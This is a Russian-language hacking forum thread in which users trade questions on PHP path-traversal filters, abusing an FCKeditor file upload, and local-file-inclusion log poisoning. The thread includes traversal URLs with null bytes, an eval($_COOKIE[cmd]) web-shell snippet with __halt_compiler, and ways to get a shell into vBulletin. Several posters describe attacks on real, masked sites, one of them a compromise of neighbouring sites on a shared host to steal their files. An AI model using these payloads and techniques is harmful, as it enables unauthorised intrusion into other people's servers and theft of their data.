Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,419
    Likes Received:
    815
    Reputations:
    848
    Потестил у себя , базовый набор денвера PHP: Version 5.3.3, ОС: Windows
    Файилы инклудится с корня...
     
    _________________________
    1 person likes this.
  2. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Грузится
    http://localhost/a/inc.php?inc=../index.php​


    не грузится.
    http://localhost/a/inc.php?inc=..\/index.php​

    Перепробовал все варианты, все равно не грузится гад.
     
    #19562 R0nin, 3 Mar 2012
    Last edited: 3 Mar 2012
  3. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Простите за упорство, но решение вопроса должен был довести до конца.
    Перепробовал на трех разных OS, версия PHP отличаются:

    Debian & Ubuntu:
    Работает
    http://localhost/a/inc.php?inc=../index.php​
    Не работает!
    http://localhost/a/inc.php?inc=..\/index.php​


    Windows XP:
    Работает
    http://localhost/a/inc.php?inc=../index.php​
    Работает
    http://localhost/a/inc.php?inc=..\index.php​
    Работает!
    http://localhost/a/inc.php?inc= ..\/index.php​
    Работает!
    http://localhost/a/inc.php?inc=../\index.php - через этот фильтр не пройдет, но таким способом тоже можно задать путь к файлу​

    Вывод:
    На Windows такая комбинация работает, потому что путь к файлу можно задавать как через \ так и через / (на Linux только /). Поэтому если в Windows задать \/ или /\ то это аналогично линуксовскому //.


    Получается мой изначальный ответ был правильным - на Linux не работает. Если я где-то допустил ошибку сообщите.
     
    #19563 R0nin, 3 Mar 2012
    Last edited: 3 Mar 2012
    1 person likes this.
  4. Card3

    Card3 Member

    Joined:
    15 Nov 2008
    Messages:
    29
    Likes Received:
    26
    Reputations:
    1
    Помогите раскрутить fckeditor version 2.6.6 Build 25427

    Могу заливаьт картинки. больше ничего и файлы (точно знаю, что .txt)

    2-а вопроса:

    1. Как удалять файлы? (думаю, есть какой то параметр в ( Command=GetFoldersAndFiles )

    PHP:
    http://******.ru/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    Заливка возможна через:

    PHP:
    http://******.ru/fckeditor/editor/filemanager/connectors/uploadtest.html
    PHP:
    http://******.ru/fckeditor/editor/filemanager/connectors/test.html
    2. Как туда ливануть шел. includ`а нет, либо не нашел.
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    там пофиксена бага с заливкой шелла..не зальешь
     
  6. Card3

    Card3 Member

    Joined:
    15 Nov 2008
    Messages:
    29
    Likes Received:
    26
    Reputations:
    1
    Хорошо. А как удалить папки и файлы? (.txt)
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    админ удалит когда спалит
     
  8. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    LFI, проблема инклуда пхп кода в логи

    Помогите понять некоторые проблемы, с которыми я столкнулся при раскрутке LFI уязвимости. Нашол логи:
    http://www.domain.com/index.php?option=com_jresearch&controller=../../../../../../../../../../../../../homepages/26/d13583872/htdocs/logs/access.log.current%00
    пробую проинклудить с помощью юзер агента код вида
    <?php eval(stripslashes($_GET["cmd"])); ?> - херит логи и выдает ошибку что то типа связаную с кавычками, пробую вот так
    <?php eval($_COOKIE[cmd]); ?>
    в куки заганяю - cmd=phpinfo();
    та же ерунда...
    помогите разобраться с уязвимостью.
     
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    access.log испорчен, ищи другой способ.
     
    _________________________
  10. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    а как инклудить чтоб неиспортить логи?
    p.s. способ с /proc/self/environ%00 не катит, есть еще какие способы, а то уже готов бросить поиски?
     
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    http://forum.antichat.ru/thread232773.html
     
    _________________________
  12. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    эту ветку всю перечитал, но вот так и не нашол ответа на вопрос, как инклудить в лог access чтоб его не испортить
     
  13. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Zahar, попробуй такое
    PHP:
    <?php 
    eval($_COOKIE[cmd]); 
     __halt_compiler();
    ?>
    __halt_compiler() остановит выполнение скрипта, компилятор так и не увидит синтаксических ошибок в коде (если их конечно не будет выше) и выполнит твой код выше.
     
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Логи пишутся в конец файла, по этому сначала отработает испорченный код, а потом вывалиться ошибка.
     
    _________________________
  15. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    да логи пишуться в конец файла, это 100%.
    на испорченом логе произойдет та же ошибка, но дело в том что я столкнулся с таким не на одном сайте а на множестве, надо попробовать выше описаный код. отпишу сдесь обязательно.
     
  16. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    243
    Likes Received:
    87
    Reputations:
    1
    Собственно вопрос, получил доступ к одному сайту (задача добратся к соседу), слил базу нашел логин и пароль админа удачно авторизировался на соседнем сайте, как залить shell на соседний сайт (для загрузки файлов там используется ckeditor), если везде установлен open_basedir, для доступа к файлам соседа использовал PHP 5.2.9 safe_mode & open_basedir bypass, но надоело по 1 файлу копировать, как можно заупаковать все сайты на сервере и скачать одним архивом? (пробывал различные шеллы в том числе и wso, не один не обошел open_basedir.
    [​IMG]
    и почему там отображает директории(что за символы) open_basedir bypass?
    Server OS : FreeBSD 8.2-RELEASE #0: Fri Feb 18 02:24:46 UTC 2011
    Server software : Apache/2.0.63 (Unix) PHP/5.2.8 cURL MySQL/4.1.25
    User info : uid=2525(apache) gid=2523(apache)
    SafeMode : OFF
    OpenBaseDir : /usr/local/psa/home/vhosts/domain.ru/httpdocs:/tmp
    Disable functions : NONE
     
  17. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    попробовал даным способом и столкнулся еще с одной проблемой, при вписывании в юзерагент кода пхп сервер попросту не отвечает, нашол еще еррор лог апача но увы
    HTML:
    Fatal error: Out of memory (allocated 56360960) (tried to allocate 47972352 bytes) in
    Попробовал просто гетом отправить вот так
    HTML:
    http://www.domain.com/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../etc/passwd%00<?php phpinfo(); ?>
    посмотрел access log но запрос попросту принял вид
    HTML:
    %3C?php%20phpinfo();%20?%3E
    для эксплуатации непригоден.
    Камрады есть еще варианты, потому как у меня попросту уже исчерпался запас.
     
  18. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    162
    Likes Received:
    1
    Reputations:
    -10
    подскажите с заливкой шелла в vbulletin
    в фак копмлит добавил php переменную
    пробывал разные методы
    мэджик квотес врублены(мб в этом трабла)
    подскажите плз
     
  19. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    162
    Likes Received:
    1
    Reputations:
    -10
    да
    (5 симв)
     
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605

    какую переменную ты добавил, как выглядит вообще твой код?
     
    _________________________
Loading...
Thread Status:
Not open for further replies.